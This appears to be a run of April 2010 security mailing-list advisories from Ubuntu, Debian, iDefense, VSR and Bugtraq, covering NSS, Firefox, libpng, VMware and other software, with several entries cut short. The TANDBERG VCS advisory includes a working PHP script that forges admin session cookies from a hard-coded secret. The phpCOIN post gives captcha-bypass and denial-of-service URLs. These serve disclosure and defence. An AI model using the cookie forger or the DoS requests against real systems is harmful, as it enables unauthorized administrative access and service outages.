[USN-927-1] NSS vulnerability
=== Ubuntu Security Notice USN-927-1 April 09, 2010 nss vulnerability CVE-2009-3555 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: libnss3-1d 3.12.6-0ubuntu0.9.10.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds support for the new new renegotiation extension and will use it when the server supports it. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.diff.gz Size/MD5:36589 0b0b4b8d1dd122093fa815d69efbc89e http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.dsc Size/MD5: 1651 a0117f537999a8c5a29dac921fe3db19 http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz Size/MD5: 5947630 da42596665f226de5eb3ecfc1ec57cd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 3235746 038ea8c22fc1adcec7c6eb94a2666e7f http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 1234192 6ce9b85ed07528c77d924d8949c85774 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 263144 cb7c75294d9ce22ed463935759f8546a http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5:17752 041cb0b8d9ef5e7dbb4a7b6b21c68fed http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 313120 9305a9fbe4473a5fbcb129052d3a9d5e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 3178260 f86edf83bfa1a693add3f9f9a5fce87d http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 1119650 7ea6f3113550c23ff2d786e8bb6826a9 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 260452 2be494403893cce2523e56003450381f http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5:17758 84b68d14e2edafa15c4d85251a234509 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 299734 78c46aca04aae9369ba47dbbbd7b4ebb lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 3216586 542551cab0ad5b7d02469995f0138483 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 1095640 673d9d626476508b78b1c01ec14da360 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 259386 22bac19ca5b1faee3374cfa4d71ee0f6 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5:17754 cf0945e1ee85107157e820fa4f1ee5c6 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 298426 25cb3017432736f8fe127efc2cef8235 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 3325392 71aa8238fa81e9eda6405450e9a15389 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 1206786 5b3f8a2c91c7c8a58055f2bdf3b47ee3 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 261718 e0f60fafda404bbcd749a1279bdd2601 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5:17758 ce3c85e4e6e53fff45bcbec8fac99ede http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 310922 acc562396e43692d342d0c44fe7e9131 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_sparc.deb Size/MD5: 2967738 84df47285cec6cdb1
[USN-921-1] Firefox 3.5 and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-921-1 April 09, 2010 firefox-3.5, xulrunner-1.9.1 vulnerabilities CVE-2010-0173, CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177, CVE-2010-0178, CVE-2010-0179, CVE-2010-0181, CVE-2010-0182 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: firefox-3.5 3.5.9+nobinonly-0ubuntu0.9.10.1 xulrunner-1.9.1 1.9.1.9+nobinonly-0ubuntu0.9.10.1 After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes. Details follow: Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered flaws in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0173, CVE-2010-0174) It was discovered that Firefox could be made to access previously freed memory. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0175, CVE-2010-0176, CVE-2010-0177) Paul Stone discovered that Firefox could be made to change a mouse click into a drag and drop event. If the user could be tricked into performing this action twice on a crafted website, an attacker could execute arbitrary JavaScript with chrome privileges. (CVE-2010-0178) It was discovered that the XMLHttpRequestSpy module as used by the Firebug add-on could be used to escalate privileges within the browser. If the user had the Firebug add-on installed and were tricked into viewing a malicious website, an attacker could potentially run arbitrary JavaScript. (CVE-2010-0179) Henry Sudhof discovered that an image tag could be used as a redirect to a mailto: URL to launch an external mail handler. (CVE-2010-0181) Wladimir Palant discovered that Firefox did not always perform security checks on XML content. An attacker could exploit this to bypass security policies to load certain resources. (CVE-2010-0182) Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.diff.gz Size/MD5: 129770 0665849c341bbaeb43dc853328434d74 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.dsc Size/MD5: 2595 b31a13643a6699a0669164e5c812e874 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly.orig.tar.gz Size/MD5: 45825322 bdb27480034e67db569e8b0f4fe180be http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.diff.gz Size/MD5:59497 700cd2dc3672792e073fa5dd2451a927 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.dsc Size/MD5: 2565 d6ac2e0d72309c2979a33e4e71c14971 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly.orig.tar.gz Size/MD5: 45124822 f3daad932b9fbf4b2fc33798e4c21e55 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73568 0f56708e218445e068269a9e1a9a6af6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73422 567aa3f3c16b4564739c4bd77e446d93 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73416 f401b03d7e3c7ba1d3dcd1fe591adef1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73416 eb00ecbb00c027b5f37fcb0e19f4909e http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73478 126936486b1bea1d490d6cc36b96acca http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73576 7212547851f9d203016dce0d233e8885 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73438 09052f4029acfb37574096c2b8f8e325 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/
[USN-920-1] Firefox 3.0 and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-920-1 April 09, 2010 firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177, CVE-2010-0178, CVE-2010-0179 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser3.0.19+nobinonly-0ubuntu0.8.10.1 firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.10.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.8.10.1 Ubuntu 9.04: abrowser3.0.19+nobinonly-0ubuntu0.9.04.1 firefox-3.0 3.0.19+nobinonly-0ubuntu0.9.04.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.9.04.1 After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes. Details follow: Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered flaws in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0174) It was discovered that Firefox could be made to access previously freed memory. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0175, CVE-2010-0176, CVE-2010-0177) Paul Stone discovered that Firefox could be made to change a mouse click into a drag and drop event. If the user could be tricked into performing this action twice on a crafted website, an attacker could execute arbitrary JavaScript with chrome privileges. (CVE-2010-0178) It was discovered that the XMLHttpRequestSpy module as used by the Firebug add-on could be used to escalate privileges within the browser. If the user had the Firebug add-on installed and were tricked into viewing a malicious website, an attacker could potentially run arbitrary JavaScript. (CVE-2010-0179) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 106784 17f50b50fa9740c6fcf82c1feb3cd2de http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2387 33644ec48d3ef7a34135f12bfc6d30ef http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly.orig.tar.gz Size/MD5: 11605275 b1e129a58d29379376f04be1959b8268 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5:79855 2ce4812dc10be1191daa98476f468cb1 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2438 4f71c33a06184499d8ff99b1efb78d66 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly.orig.tar.gz Size/MD5: 42005942 92a0017fe802a917e67dbf5d05216d6f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66558 f8afcac074ad9969983db51e54f61c16 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66568 378667968d1ed3f4345ba25a854930d4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66534 145cc5ce4f031f08fb8515cce1ad9a05 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66520 e681baa33f03eb2e8cf35b542cb36a09 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66676 04ee6cea1699facb138145aed452c8c9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66578 574947764c813c2ce224ac3a85b2663f http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66526 56d1455d499d3088331019dd795f68dd http://security.ubuntu.com/
CVE-2009-4509: TANDBERG VCS Authentication Bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: TANDBERG Video Communication Server Authentication Bypass
Release Date: 2010-04-09
Application: Video Communication Server (VCS)
Versions: x4.2.1 and possibly earlier
Severity: Critical
Discovered by: Jon Hart and Timothy D. Morgan
Advisory by: Timothy D. Morgan
Vendor Status: Update released (without security advisory) on October 9, 2009
CVE Candidate: CVE-2009-4509
Reference: http://www.vsecurity.com/resources/advisory/20100409-1/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- ---
- From [1]:
"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP Telephony
networks."
Vulnerability Overview
- --
On December 2nd, VSR identified an authentication bypass vulnerability in
TANDBERG's Video Communication Server, firmware version x4.2.1. This
vulnerability allows for the complete bypass of authentication in the
administrative web console. Since this web interface can be used to execute
arbitrary code on the appliance as root (via software updates), the severity is
considered critical.
Product Background
- --
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with number of other items.
Vulnerability Details
- -
The TANDBERG VCS web management interface utilizes custom cookies for the
purpose of session management. In version x4.2.1 of the appliance firmware
(and possibly earlier versions), it is possible to forge session cookies with
relatively little knowledge of the appliance's configuration.
The vulnerability lies in the files located at the following paths:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php
Routines in these files generate user session cookies in roughly the following
way:
SECRET = SERVER_ADDRESS + STATIC_VALUE
HASH = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH
In the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP
address, STATIC_VALUE represents a fixed string which is hard-coded into the
application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is
the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp,
and ACCESS_RIGHTS is an integer denoting the level of access assigned to the
user.
Note, that none of the information above is difficult to guess. Any owner of a
TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is
contained in the firmware updates[2]). All TANDBERG appliances have a default
user name of "admin" which has full privileges. Therefore, it is possible with
a simple PHP script to forge new cookies and access the administrative
interface:
// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //
function objectToCookie($obj)
{
$cookie = serialize($obj);
$cookie = gzcompress($cookie);
$cookie = base64_encode($cookie);
return $cookie;
}
function genCookie($server_addr, $remote_addr)
{
$user_name = "root";
$secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
$time = time()+24*60*60;
$id_hash = md5($user_name . $secret . $remote_addr . $time);
$access = 1; // ReadWrite
$login_cookie =
array( "user_name" => $user_name,
"access" => $access,
"id_hash" => $id_hash,
"ip" => $remote_addr,
"time" => $time
);
return objectToCookie($login_cookie);
}
print "Cookie: tandberg_login="
. urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}"))
. "\n";
// end of script //
TANDBERG released firmware version x4.3.0 which corrects this issue on
October 9, 2009 (prior to discovery of the vulnerability by VSR). The release
notes[3] for this updated version contain a description of the issue:
"Improved the security of the web interface to ensure that the system will not,
under any circumstances, allow an authenticated user to escalate their session
to more
Re: Vulnerabilities in phpCOIN
About Us: http://phpcoin.com/mod.php?mod=siteinfo&id=4 It is with profound sorrow, sadness and regret, that COINSoft Technologies Inc. must announce the death of their lead developer Stephen M. Kitching (cantex) after a mercifully short battle with cancer. Stephen was both an inspiration and good friend to everyone who knew and worked with him. He will be greatly missed, and his ingenuity and work will live on in the thoughts of all those, who were and will be touched, by the contributions he made to the software he dedicated his life to. Our deepest sympathies, hearts and prayers go out to Steven's family and friends. - If I were a customer of theirs I'd be cutting them some slack. I'm just sayin'. MustLive wrote: Hello Bugtraq! I want to warn you about security vulnerabilities in system phpCOIN. - Advisory: Vulnerabilities in phpCOIN - URL: http://websecurity.com.ua/4090/ - Affected products: phpCOIN 1.6.5 and previous versions. - Timeline: 17.03.2010 - found vulnerabilities. 01.04.2010 - disclosed at my site. 02.04.2010 - informed developers. - Details: These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which is using in this system. I already reported about vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/). Insufficient Anti-automation: http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2 Captcha bypass is possible via half-automated or automated (with using of OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/). DoS: http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000 With setting of large values of width and height it's possible to create large load at the server. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
iDefense Security Advisory 04.09.10: VMware VMnc Codec Heap Overflow Vulnerability
iDefense Security Advisory 04.09.10 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 09, 2010 I. BACKGROUND VMware Inc. markets several virtualization products such as ACE, Player, Server, and Workstation. These products include a video coder-decoder (codec) called 'vmnc.dll', or VMware Movie Decoder, that is registered on the host machine at installation time. This codec will be used whenever video streams of the 'VMnc' type, such as those produced when using VMware Workstation's "Capture Movie" feature, are encountered. For more information, refer to the links shown below. http://en.wikipedia.org/wiki/Codec http://www.vmware.com/support/ws5/doc/ws_running_capture.html II. DESCRIPTION Remote exploitation of a heap-based buffer overflow vulnerability in VMware Inc.'s movie decoder allows attackers to execute arbitrary code. This vulnerability exists due to a lack of input validation when processing certain specially crafted Audio-Video Interleave (AVI) files. During processing, a heap buffer will be allocated based on one part of the AVI file data. However, the amount of data copied into that buffer is calculated based on a different part of the file. This leads to an exploitable heap-based buffer overflow condition. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user running an application utilizing the vulnerable codec. In order to reach the vulnerable code, a targeted user must play a specially crafted AVI media file. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. IV. DETECTION iDefense confirmed the existence of this vulnerability using the following software. vmnc.dll version 6.5.2.7026 from Workstation 6.5.2 vmnc.dll version 6.5.3. from Workstation 6.5.3 A full list of affected VMware products can be found in Security Advisory VMSA-2010-0007. V. WORKAROUND Disabling the 'VMnc' codec will prevent exploitation. In order to do so, import the 'disable-vmnc-codec.reg' registry file as follows. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32] "VIDC.VMnc"=- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32] "VIDC.VMnc"=- VI. VENDOR RESPONSE VMware Inc. has released patches to address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://lists.vmware.com/pipermail/security-announce/2010/90.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-1564 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/25/2009 Initial Vendor Notification 08/25/2009 Initial Vendor Reply 04/09/2010 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[USN-927-2] NSS regression
=== Ubuntu Security Notice USN-927-2 April 11, 2010 nss regression https://launchpad.net/bugs/559881 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: libnss3-1d 3.12.6-0ubuntu0.9.10.2 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: USN-927-1 fixed vulnerabilities in NSS. Upstream NSS 3.12.6 added an additional checksum verification on libnssdbm3.so, but the Ubuntu packaging did not create this checksum. As a result, Firefox could not initialize the security component when the NSS Internal FIPS PKCS #11 Module was enabled. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds support for the new new renegotiation extension and will use it when the server supports it. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.2.diff.gz Size/MD5:36659 1c82d002115ed4a76dc98d33ef5c839c http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.2.dsc Size/MD5: 1651 41544d2843858123ad5852de1587744c http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz Size/MD5: 5947630 da42596665f226de5eb3ecfc1ec57cd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_amd64.deb Size/MD5: 3235700 8227d9d710a9784750fc541f82d85101 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_amd64.deb Size/MD5: 1234558 f8db18eb4fec7df4387e5e546ea99871 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_amd64.deb Size/MD5: 263208 692167e64c00a9990af72a28299b4fbb http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.2_amd64.deb Size/MD5:17854 f9fa214108ab20d8fe4d61567a86d7c0 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.2_amd64.deb Size/MD5: 313212 4ae57dcb06572bcdc1e311977a965c55 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_i386.deb Size/MD5: 3178422 4a141b3f01631497184c0bb260a212f3 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_i386.deb Size/MD5: 1119994 8e4bfbd067aa051603306ce57949ce51 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_i386.deb Size/MD5: 260530 c61feb6f65d7419f93f355a5f0755917 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.2_i386.deb Size/MD5:17856 05ac21be0089e816c076f8707d41d21b http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.2_i386.deb Size/MD5: 299834 26d317dc29710b27dd0d0b7a36b6c2a1 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_lpia.deb Size/MD5: 3216556 9230b137f92129c304dddfc5c67853fe http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_lpia.deb Size/MD5: 1095892 9566ecb3416bd99ba0e6288505626fe9 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_lpia.deb Size/MD5: 259484 0236cb25267ac3ca1b3bfd586d14d26d http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.2_lpia.deb Size/MD5:17858 ecb362aec61c87f1cfc4e86cd2dec5cb http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.2_lpia.deb Size/MD5: 298510 2977f41a1b2fcf7ca25b331336f7dc8f powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_powerpc.deb Size/MD5: 3325490 ac9caf32bab4d4b911d1c54112583b65 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_powerpc.deb Size/MD5: 1207122 99b17d40842c1804ee23d19e4a7ffaa0 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_powerpc.deb Size/MD5: 261820 f46b59e90bf4ff07ca79b5d404f372ed http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.
[SECURITY] [DSA 2032-1] New libpng packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2032-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano April 11, 2010http://www.debian.org/security/faq - Package: libpng Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-2042 CVE-2010-0205 Debian Bugs: 533676 572308 Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-2042 libpng does not properly parse 1-bit interlaced images with width values that are not divisible by 8, which causes libpng to include uninitialized bits in certain rows of a PNG file and might allow remote attackers to read portions of sensitive memory via "out-of-bounds pixels" in the file. CVE-2010-0205 libpng does not properly handle compressed ancillary-chunk data that has a disproportionately large uncompressed representation, which allows remote attackers to cause a denial of service (memory and CPU consumption, and application hang) via a crafted PNG file For the stable distribution (lenny), these problems have been fixed in version 1.2.27-2+lenny3. For the testing (squeeze) and unstable (sid) distribution, these problems have been fixed in version 1.2.43-1 We recommend that you upgrade your libpng package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to 